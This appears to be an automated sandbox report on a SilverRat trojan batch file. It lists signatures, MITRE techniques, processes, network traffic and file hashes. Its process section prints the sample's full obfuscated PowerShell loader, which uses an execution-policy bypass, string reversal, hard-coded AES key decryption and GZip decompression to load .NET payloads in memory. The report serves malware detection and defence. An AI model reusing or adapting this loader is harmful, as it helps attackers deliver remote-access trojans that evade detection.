Malware Analysis Report

2025-03-15 01:11

Sample ID 250214-lk4gna1pgk
Target rthingy.bat
SHA256 d9afd4677b6374d120c2408bdc25c4d5fa2625ece198e0c0eed45960edee89b4
Tags
silverrat discovery execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d9afd4677b6374d120c2408bdc25c4d5fa2625ece198e0c0eed45960edee89b4

Threat Level: Known bad

The file rthingy.bat was found to be: Known bad.

Malicious Activity Summary

silverrat discovery execution trojan

SilverRat

Silverrat family

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-02-14 09:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-14 09:36

Reported

2025-02-14 09:39

Platform

win11-20250210-en

Max time kernel

147s

Max time network

150s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rthingy.bat"

Signatures

SilverRat

trojan silverrat

Silverrat family

silverrat

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3418141264-4181727730-1624968314-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3904 wrote to memory of 1084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3904 wrote to memory of 1084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rthingy.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Meo76zIdzGxWzcGjAKAOLGgRVR1B6hHfBtJu6auoogA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ru86nRFMP8Q91uK61+/ow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dAblc=New-Object System.IO.MemoryStream(,$param_var); $shsCO=New-Object System.IO.MemoryStream; $SyeQT=New-Object System.IO.Compression.GZipStream($dAblc, [IO.Compression.CompressionMode]::Decompress); $SyeQT.CopyTo($shsCO); $SyeQT.Dispose(); $dAblc.Dispose(); $shsCO.Dispose(); $shsCO.ToArray();}function execute_function($param_var,$param2_var){ $tTPRa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wQaXC=$tTPRa.EntryPoint; $wQaXC.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rthingy.bat';$lVTof=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rthingy.bat').Split([Environment]::NewLine);foreach ($pGkrh in $lVTof) { if ($pGkrh.StartsWith(':: ')) { $PioZz=$pGkrh.Substring(3); break; }}$payloads_var=[string[]]$PioZz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MkNGRkIzNEMtNTAxMC00Njk3LThGMjMtNTVGMjVDOEQyOThCfSIgdXNlcmlkPSJ7NkRCQTg2QzUtMjAyMC00RTcyLTkzMEQtQTg2NkFGQ0FDMjBDfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7OEJCMzU4RTYtNkVDNS00RTY3LTgyNjctOTE2NDQ4M0Y5N0Q0fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjMiIGluc3RhbGxkYXRldGltZT0iMTczOTE4NDAzMyIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNjU1NjU2MjA2MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjU2MjE1MjgwMzgiLz48L2FwcD48L3JlcXVlc3Q-

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
NL 4.175.87.113:443 msedge.api.cdp.microsoft.com tcp
US 199.232.210.172:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp

Files

memory/1084-0-0x00007FFDA9143000-0x00007FFDA9145000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttrtiaum.rkg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1084-9-0x000001FEE8440000-0x000001FEE8462000-memory.dmp

memory/1084-10-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp

memory/1084-11-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp

memory/1084-12-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp

memory/1084-14-0x000001FEE84D0000-0x000001FEE84DE000-memory.dmp

memory/1084-13-0x000001FED0320000-0x000001FED0328000-memory.dmp

memory/1084-15-0x000001FEE8500000-0x000001FEE8510000-memory.dmp

memory/1084-18-0x00007FFDA9143000-0x00007FFDA9145000-memory.dmp

memory/1084-19-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 1f2c3f2201f48d8183a4d61d798177e5
SHA1 ff85fab86cb79b8ac862b879ab272d8f9b0bbec4
SHA256 22be5badfa40ffa908d70638e28419b940437e5140925138164bac9a474770e9
SHA512 1597efbb2d05fd309573c529a6a0608d90730d4d90f362c529aaa16d564c7e82b963b06b8d68ee3404a981318c5fcedd0ea5e117e2bc92ed88108864b708d27d

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 fc6dd02bcc9dcd70d2d2e6f2bf6a8480
SHA1 a804945de20c3c5c7d9e20ba5a29d989f71736fd
SHA256 205cd193614c5c6ecde093110505bd11d404520b992be7f0ebe3bb75c4c7ba4b
SHA512 0852b513ebcfb57cf5da8a10db5cd6723913ebb90ed25efb3d3e8ee1a3ef1e32ae9b41b0ada3505ace90a98938ed4b9d926884b3d9db40a9e74a97aa32625d20